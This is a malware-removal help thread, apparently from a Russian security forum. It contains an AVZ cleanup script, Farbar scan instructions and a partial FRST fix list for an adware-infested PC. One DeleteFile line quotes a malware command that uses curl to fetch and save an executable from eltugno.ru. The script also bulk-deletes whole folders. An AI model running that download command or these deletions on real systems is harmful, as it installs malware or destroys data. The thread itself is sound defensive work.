After installing drivers, something else got downloaded as well. After that, the computer's performance dropped by about half. It started lagging more often, etc. Please help me get rid of them!
Dear [B]Foxwill[/B], thank you for contacting our forum!
Help with cleaning your computer on VirusInfo.Info is provided completely free of charge. Helpers will respond to your request very soon. To receive help, you need to provide scan logs produced by the Autologger utility; for details, see the [URL="https://virusinfo.info/pravila.html"]rules for submitting a help request[/URL].
[INFORMATION]If you would like personal, guaranteed help with priority handling, use the paid service [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
If our site proves useful to you and you have the opportunity, please [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]support the project[/URL].
[url="http://virusinfo.info/showthread.php?t=7239"]Run the script in AVZ[/url]:[code]begin
TerminateProcessByName('C:\Users\Огурцов\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\mineonepapkamainj\trz26F4.tmp');
StopService('0177541477233912mcinstcleanup');
StopService('swsedrvr_vw_1_10_0_25');
QuarantineFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\hnsn92F5.tmp', '');
QuarantineFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\knsw5C1E.tmpfs', '');
QuarantineFile('C:\Program Files (x86)\87684081-1477484938-11CB-A5D0-F6E7D98D013F\knsyC641.tmpfs', '');
QuarantineFile('C:\Program Files (x86)\87684081-1479991071-11CB-A5D0-F6E7D98D013F\knsA992.tmp', '');
QuarantineFile('C:\Program Files (x86)\amuleC\ed2k.exe', '');
QuarantineFile('C:\Program Files (x86)\IconRunner\MoneyBot.exe', '');
QuarantineFile('C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe', '');
QuarantineFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\QMUdisk64.sys', '');
QuarantineFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\softaal64.sys', '');
QuarantineFile('C:\Program Files (x86)\WeatherChickn\WeatherChickn.exe', '');
QuarantineFile('C:\Program Files (x86)\Youtube AdBlock\IEEF\qu_X9D.dll', '');
QuarantineFile('C:\Program Files\7Q9Q65LS95\4E7W8PR7O.exe', '');
QuarantineFile('C:\Program Files\ByteFence\ByteFence.exe', '');
QuarantineFile('c:\program files\bytefence\ByteFenceService.exe', '');
QuarantineFile('c:\program files\bytefence\rtop\bin\rtop_svc.exe', '');
QuarantineFile('C:\Program Files\UBar\UbarDriver.sys', '');
QuarantineFile('C:\Program Files\UBar\UbarService.exe', '');
QuarantineFile('C:\Program Files\UYV96CZO7J\T5PQVB4YQ.exe', '');
QuarantineFile('C:\ProgramData\Doubleing\Doubleing.exe', '');
QuarantineFile('C:\ProgramData\hdtask\hdtask.exe', '');
QuarantineFile('C:\ProgramData\Logic Handler\set.exe', '');
QuarantineFile('C:\ProgramData\NetworkPacketManitor\Nettrans.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\DuckGo\duckgo.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\Hostinstaller\4266426696_monster.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\Kometa\StartButton\kometastartvx64.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\lumsystem\lumsystem.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\MailruSetup\MailruSetup.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\ScriptWriter\ScriptWriter.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\yc\Application\yc.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\LocalLow\SearchGo\searchgo.dll', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\Adobe\Manager.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\curl\curl_7_54.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\app.py', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\ml.py', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\mineonepapkamainj\trz26F4.tmp', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\WindowsUpdater\Updater.exe', '');
QuarantineFile('C:\Users\Огурцов\ReportSender\ReportSender.exe', '');
QuarantineFile('C:\WINDOWS\Microsoft\svchost.exe', '');
QuarantineFile('C:\WINDOWS\system32\drivers\swsedrvr_vw_1_10_0_25.sys', '');
QuarantineFile('C:\WINDOWS\SysWOW64\SearchProtectService.exe', '');
QuarantineFile('C:\WINDOWS\TEMP\017754~1.EXE', '');
QuarantineFileF('c:\program files (x86)\87684081-1451210377-11cb-a5d0-f6e7d98d013f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
QuarantineFileF('c:\program files (x86)\87684081-1477484938-11cb-a5d0-f6e7d98d013f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
QuarantineFileF('c:\program files (x86)\87684081-1479991071-11cb-a5d0-f6e7d98d013f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
QuarantineFileF('c:\program files (x86)\amulec', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
QuarantineFileF('c:\programdata\doubleing', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
QuarantineFileF('c:\users\огурцов\appdata\local\hostinstaller', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', true, '', 0 , 0);
QuarantineFileF('c:\users\огурцов\appdata\roaming\microsoft\systemcertificates\my\ctls\mineonepapkamainj', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
DeleteFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\hnsn92F5.tmp', '');
DeleteFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\knsw5C1E.tmpfs', '');
DeleteFile('C:\Program Files (x86)\87684081-1477484938-11CB-A5D0-F6E7D98D013F\knsyC641.tmpfs', '');
DeleteFile('C:\Program Files (x86)\87684081-1479991071-11CB-A5D0-F6E7D98D013F\knsA992.tmp', '');
DeleteFile('C:\Program Files (x86)\amuleC\ed2k.exe', '');
DeleteFile('C:\Program Files (x86)\IconRunner\MoneyBot.exe', '32');
DeleteFile('C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe', '');
DeleteFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\QMUdisk64.sys', '');
DeleteFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\softaal64.sys', '');
DeleteFile('C:\Program Files (x86)\WeatherChickn\WeatherChickn.exe', '');
DeleteFile('C:\Program Files (x86)\Youtube AdBlock\IEEF\qu_X9D.dll', '');
DeleteFile('C:\Program Files\7Q9Q65LS95\4E7W8PR7O.exe', '32');
DeleteFile('C:\Program Files\ByteFence\ByteFence.exe', '');
DeleteFile('c:\program files\bytefence\ByteFenceService.exe', '');
DeleteFile('c:\program files\bytefence\rtop\bin\rtop_svc.exe', '');
DeleteFile('C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll', '32');
DeleteFile('C:\Program Files\UBar\UbarDriver.sys', '');
DeleteFile('C:\Program Files\UBar\UbarService.exe', '');
DeleteFile('C:\Program Files\UYV96CZO7J\T5PQVB4YQ.exe', '32');
DeleteFile('C:\ProgramData\Doubleing\Doubleing.exe', '');
DeleteFile('C:\ProgramData\hdtask\hdtask.exe', '32');
DeleteFile('C:\ProgramData\Logic Handler\set.exe', '');
DeleteFile('C:\ProgramData\NetworkPacketManitor\Nettrans.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Local\DuckGo\duckgo.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Local\Hostinstaller\4266426696_monster.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Local\Kometa\StartButton\kometastartvx64.exe', '64');
DeleteFile('C:\Users\Огурцов\AppData\Local\lumsystem\lumsystem.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Local\lumsystem\lumsystem.exe', '32');
DeleteFile('C:\Users\Огурцов\AppData\Local\MailruSetup\MailruSetup.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Local\ScriptWriter\ScriptWriter.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Local\yc\Application\yc.exe', '32');
DeleteFile('C:\Users\Огурцов\AppData\LocalLow\SearchGo\searchgo.dll', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\Adobe\Manager.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\curl\curl.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\curl\curl_7_54.exe -f -s -L http://eltugno.ru/f.exe -o "C:\Users\Огурцов\AppData\Roaming\curl\curl.exe"', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\curl\curl_7_54.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\app.py', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\ml.py', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\ml.py', '32');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '32');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\mineonepapkamainj\trz26F4.tmp', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\WindowsUpdater\Updater.exe', '');
DeleteFile('C:\Users\Огурцов\ReportSender\ReportSender.exe', '');
DeleteFile('C:\WINDOWS\Microsoft\svchost.exe', '');
DeleteFile('C:\WINDOWS\system32\drivers\swsedrvr_vw_1_10_0_25.sys', '');
DeleteFile('C:\WINDOWS\SysWOW64\SearchProtectService.exe', '');
DeleteFile('C:\WINDOWS\TEMP\017754~1.EXE', '');
DeleteFile('http:\eltugno.ru\f.exe', '');
ExecuteFile('schtasks.exe', '/delete /TN "ByteFence" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor2" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "DuckGo Task" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "LumProcess" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Multimedia\MailruSetup" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Multimedia\Manager" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Multimedia\ReportSender" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "One System Care Monitor" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "ScriptWriter" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Soft installer" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "WindowsUpdater" /F', 0, 15000, true);
DeleteService('0177541477233912mcinstcleanup');
DeleteService('ancykxdb');
DeleteService('anqnvoio');
DeleteService('apswdtxg');
DeleteService('aywzshgp');
DeleteService('backlh');
DeleteService('bbbudopp');
DeleteService('bcouyzjs');
DeleteService('bjsehlvo');
DeleteService('bozmbqij');
DeleteService('bpifnwbn');
DeleteService('bqgiiaih');
DeleteService('bycvkxab');
DeleteService('ByteFenceService');
DeleteService('chaeuizt');
DeleteService('cjsggimu');
DeleteService('coessqjo');
DeleteService('cvafeojm');
DeleteService('cytilizo');
DeleteService('czasafsn');
DeleteService('dbx');
DeleteService('dennzevk');
DeleteService('dkomupml');
DeleteService('Doubleing');
DeleteService('ebteumgs');
DeleteService('eclpjzhy');
DeleteService('ed2kidle');
DeleteService('eijcgadq');
DeleteService('ejdhbujs');
DeleteService('ejqmezgn');
DeleteService('exzpnbkc');
DeleteService('fikhcuvx');
DeleteService('flctpmkv');
DeleteService('fpozvpip');
DeleteService('fsppkmsm');
DeleteService('ftrievld');
DeleteService('ggbczjib');
DeleteService('grogkvul');
DeleteService('gypnyrpk');
DeleteService('hnybidnj');
DeleteService('hurqvgof');
DeleteService('hvmspoqn');
DeleteService('ilwmvcxg');
DeleteService('jlddrvts');
DeleteService('jqtdndvb');
DeleteService('jvtgngyq');
DeleteService('jwxbxmze');
DeleteService('khxlthud');
DeleteService('kvlyyfev');
DeleteService('lgsvhrfs');
DeleteService('LiveUpdateSvc');
DeleteService('lonekmwa');
DeleteService('lpodhrht');
DeleteService('lxhhogbx');
DeleteService('makmjdwm');
DeleteService('McComponentHostService');
DeleteService('mcqtjynl');
DeleteService('muiikavs');
DeleteService('naylrybp');
DeleteService('Nettrans');
DeleteService('nfhcuzwm');
DeleteService('nlwxeqhr');
DeleteService('nomsbdff');
DeleteService('nrbvdmvg');
DeleteService('nugobuse');
DeleteService('nvnprykv');
DeleteService('obzzxyvx');
DeleteService('ohxgsnag');
DeleteService('okiuazqx');
DeleteService('okvgqsba');
DeleteService('paplbcjx');
DeleteService('pejcktpo');
DeleteService('pkfahwgk');
DeleteService('pmpqtklp');
DeleteService('qfybyovi');
DeleteService('QMUdisk');
DeleteService('qnabfcdz');
DeleteService('qnyphnvj');
DeleteService('qprkqvxc');
DeleteService('qtvoxmki');
DeleteService('qxkidsjg');
DeleteService('rlzazkuc');
DeleteService('rngeiytu');
DeleteService('rtbhagez');
DeleteService('rtop');
DeleteService('rwzavqul');
DeleteService('ryshjglb');
DeleteService('snfbvbhr');
DeleteService('softaal');
DeleteService('sokylole');
DeleteService('SPS');
DeleteService('srbqkcgi');
DeleteService('SvcHost Service Host');
DeleteService('swsedrvr_vw_1_10_0_25');
DeleteService('tcuuadtw');
DeleteService('tdczeevt');
DeleteService('tddgzhju');
DeleteService('tglssguf');
DeleteService('tgrnveup');
DeleteService('thkzcpun');
DeleteService('tkskrchq');
DeleteService('TrueKeyScheduler');
DeleteService('TrueKeyServiceHelper');
DeleteService('txvipmsx');
DeleteService('tysjnfcx');
DeleteService('UbarCalloutDriver');
DeleteService('UbarPolicyProvider');
DeleteService('ufghthyv');
DeleteService('ujbugeqa');
DeleteService('umxkcunc');
DeleteService('uotgmlmb');
DeleteService('Updater.Mail.Ru');
DeleteService('UvConverter');
DeleteService('uxbsnitn');
DeleteService('uxgtprhf');
DeleteService('uzcxzozd');
DeleteService('WeatherChiknSrvr');
DeleteService('wfcgtqki');
DeleteService('wifpmdvy');
DeleteService('wssxrmyk');
DeleteService('wucotusy');
DeleteService('xdjbpzhr');
DeleteService('xdrveulz');
DeleteService('yiamwbab');
DeleteService('yrnymepm');
DeleteService('ytwykeaw');
DeleteService('zalvstec');
DeleteService('zazbfhvj');
DeleteFileMask('c:\program files (x86)\87684081-1451210377-11cb-a5d0-f6e7d98d013f', '*', true);
DeleteFileMask('c:\program files (x86)\87684081-1477484938-11cb-a5d0-f6e7d98d013f', '*', true);
DeleteFileMask('c:\program files (x86)\87684081-1479991071-11cb-a5d0-f6e7d98d013f', '*', true);
DeleteFileMask('c:\program files (x86)\amulec', '*', true);
DeleteFileMask('c:\program files (x86)\iconrunner', '*', true);
DeleteFileMask('c:\program files (x86)\onesystemcare', '*', true);
DeleteFileMask('c:\program files (x86)\tencent', '*', true);
DeleteFileMask('c:\program files (x86)\weatherchickn', '*', true);
DeleteFileMask('c:\program files (x86)\youtube adblock', '*', true);
DeleteFileMask('c:\program files\7q9q65ls95', '*', true);
DeleteFileMask('c:\program files\bytefence', '*', true);
DeleteFileMask('c:\program files\ubar', '*', true);
DeleteFileMask('c:\program files\uyv96czo7j', '*', true);
DeleteFileMask('c:\programdata\doubleing', '*', true);
DeleteFileMask('c:\programdata\hdtask', '*', true);
DeleteFileMask('c:\programdata\logic handler', '*', true);
DeleteFileMask('c:\programdata\networkpacketmanitor', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\local\duckgo', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\local\hostinstaller', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\local\lumsystem', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\local\mailrusetup', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\local\scriptwriter', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\local\yc', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\locallow\searchgo', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\roaming\curl', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\roaming\currencyconvertor', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\roaming\microsoft\systemcertificates\my\ctls\mineonepapkamainj', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\roaming\windowsupdater', '*', true);
DeleteFileMask('c:\users\огурцов\reportsender', '*', true);
DeleteDirectory('c:\program files (x86)\87684081-1451210377-11cb-a5d0-f6e7d98d013f');
DeleteDirectory('c:\program files (x86)\87684081-1477484938-11cb-a5d0-f6e7d98d013f');
DeleteDirectory('c:\program files (x86)\87684081-1479991071-11cb-a5d0-f6e7d98d013f');
DeleteDirectory('c:\program files (x86)\amulec');
DeleteDirectory('c:\program files (x86)\iconrunner');
DeleteDirectory('c:\program files (x86)\onesystemcare');
DeleteDirectory('c:\program files (x86)\tencent');
DeleteDirectory('c:\program files (x86)\weatherchickn');
DeleteDirectory('c:\program files (x86)\youtube adblock');
DeleteDirectory('c:\program files\7q9q65ls95');
DeleteDirectory('c:\program files\bytefence');
DeleteDirectory('c:\program files\ubar');
DeleteDirectory('c:\program files\uyv96czo7j');
DeleteDirectory('c:\programdata\doubleing');
DeleteDirectory('c:\programdata\hdtask');
DeleteDirectory('c:\programdata\logic handler');
DeleteDirectory('c:\programdata\networkpacketmanitor');
DeleteDirectory('c:\users\огурцов\appdata\local\duckgo');
DeleteDirectory('c:\users\огурцов\appdata\local\hostinstaller');
DeleteDirectory('c:\users\огурцов\appdata\local\lumsystem');
DeleteDirectory('c:\users\огурцов\appdata\local\mailrusetup');
DeleteDirectory('c:\users\огурцов\appdata\local\scriptwriter');
DeleteDirectory('c:\users\огурцов\appdata\local\yc');
DeleteDirectory('c:\users\огурцов\appdata\locallow\searchgo');
DeleteDirectory('c:\users\огурцов\appdata\roaming\curl');
DeleteDirectory('c:\users\огурцов\appdata\roaming\currencyconvertor');
DeleteDirectory('c:\users\огурцов\appdata\roaming\microsoft\systemcertificates\my\ctls\mineonepapkamainj');
DeleteDirectory('c:\users\огурцов\appdata\roaming\windowsupdater');
DeleteDirectory('c:\users\огурцов\reportsender');
DelBHO('{2BC46CFA-4B00-4193-A7BD-6AD1D0BCB5BC}');
DelBHO('{598AEFC6-DD3C-4A63-9AC3-53FCF6155931}');
DelBHO('{95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B}');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '6GMTU8RLCT');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'aebleyzkpy');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CurrencyConvertor');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'hdtask');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'K8J77YTFGJ');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'LumProcess');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ycAutoLaunch_1C57F4F4FD8066828BC5E4D43E9AF813');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'APSDaemon');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'IconRunner');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 2, true);
RebootWindows(false);
end.[/code]The computer will reboot.
A quarantine archive, quarantine.zip, will appear in the AVZ folder; send this file via the "Send requested quarantine" link above the first post in the thread.
Download [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] and save it to the Desktop.
Note: you need to choose the version that is compatible with your operating system. If you are not sure which version suits your system, download both and try to run them. Only one of them will run on your system.
Run the program. When the program starts, click Yes to accept the warning.
Click the Scan button.
When the scan finishes, the reports FRST.txt and Addition.txt will be created in the same folder the program was run from.
Attach these files to your next post (preferably both in one archive).
Thank you very much, but what should I do after I have sent the quarantine archive? Wait for a reply?
Read my message to the end. And so far, instead of the quarantine, you have stuffed in 1) AutoLogger itself and 2) its logs.
Please forgive my inattention....
Here is the file
Open Notepad (Start => Programs => Accessories => Notepad). Copy the following code into it:[CODE]CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\Run: [MailRuUpdater] => C:\Users\Огурцов\AppData\Local\Mail.Ru\MailRuUpdater.exe [4100312 2017-11-24] (Mail.Ru) <==== ATTENTION
AppInit_DLLs: C:\ProgramData\ApppaznoR\Quadtofind.dll => No File
AppInit_DLLs-x32: C:\ProgramData\ApppaznoR\Stim-Lam.dll => No File
ShellExecuteHooks: No Name - {83922134-9CE0-11E6-9D68-64006A5CFC23} - C:\Users\Огурцов\AppData\Roaming\Mdolybuers\Huqoent.dll -> No File <==== ATTENTION
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.376\SSScheduler.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Zaxar Games Browser.lnk [2017-11-02] <==== ATTENTION
ShortcutTarget: Zaxar Games Browser.lnk -> C:\Program Files (x86)\Zaxar\ZaxarLoader.exe (Zaxar LTD) <==== ATTENTION
ShortcutTarget: ProfitTaskMonitor.lnk -> C:\Program Files (x86)\ProfitTask\ProfitTaskMonitor.exe (No File)
GroupPolicy: Restriction - Chrome <==== ATTENTION
GroupPolicy\User: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.oursurfing.com/web/?type=ds&ts=1445087024&z=d486f1b5cbe2d9f121db6f9gaz8z0wce5bfm5e1ocz&from=amt&uid=wdcxwd5000lpvx-08v0tt5_wd-wxc1a34d4616d4616&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1478246974&z=2d729a5d79fdd8a964fb447gbz5m0b6oazeqatbq5m&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.oursurfing.com/web/?type=ds&ts=1445087024&z=d486f1b5cbe2d9f121db6f9gaz8z0wce5bfm5e1ocz&from=amt&uid=wdcxwd5000lpvx-08v0tt5_wd-wxc1a34d4616d4616&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1478246974&z=2d729a5d79fdd8a964fb447gbz5m0b6oazeqatbq5m&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms}
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFqgp4F2dqqpnoYOs0vb2kBGtsNnrQmSzX4g4YVHHTW5j75Qxd6AUNHBycrlraEN1eWuVTdwSzwVHhsUbElK2OVNSYVd8hPOwbsDwNEb0FlSaal9sgmdDE_QgmcO47EyoULHAo_6i2UMVGJljdLPlwIi0rAAKeE,&q={searchTerms}
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://firstsputnik.ru/?ri=1&uid=ab3b05442b67d72976b82968da1b6bad&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFqgp4F2dqqpnoYOs0vb2kBGtsNnrQmSzX4g4YVHHTW5j75Qxd6AUNHBycrlraEN1eWuVTdwSzwVHhsUbElK2OVNSYVd8hPOwbsDwNEb0FlSaal9sgmdDE_QgmcO47EyoULHAo_6i2UMVGJljdLPlwIi0rAAKeE,&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1478246974&z=2d729a5d79fdd8a964fb447gbz5m0b6oazeqatbq5m&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3D} URL = hxxp://firstsputnik.ru/?ri=1&uid=ab3b05442b67d72976b82968da1b6bad&q=
SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.amisites.com/search/?type=ds&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {A06ED961-D98F-4CF9-A89B-80AB11DB149C} URL = hxxp://go-search.ru/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B1B60E205-BA95-469A-87F0-C2C71B3A6798%7D&gp=832418
SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {ielnksrch} URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFqgp4F2dqqpnoYOs0vb2kBGtsNnrQmSzX4g4YVHHTW5j75Qxd6AUNHBycrlraEN1eWuVTdwSzwVHhsUbElK2OVNSYVd8hPOwbsDwNEb0FlSaal9sgmdDE_QgmcO47EyoULHAo_6i2UMVGJljdLPlwIi0rAAKeE,&q={searchTerms}
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll => No File
BHO: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files (x86)\Youtube AdBlock\IEEF\6IrSQWjT.dll => No File
BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll => No File
BHO-x32: [email protected] -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\Огурцов\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll [2017-11-26] (Mail.Ru)
BHO-x32: No Name -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> No File
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll No File
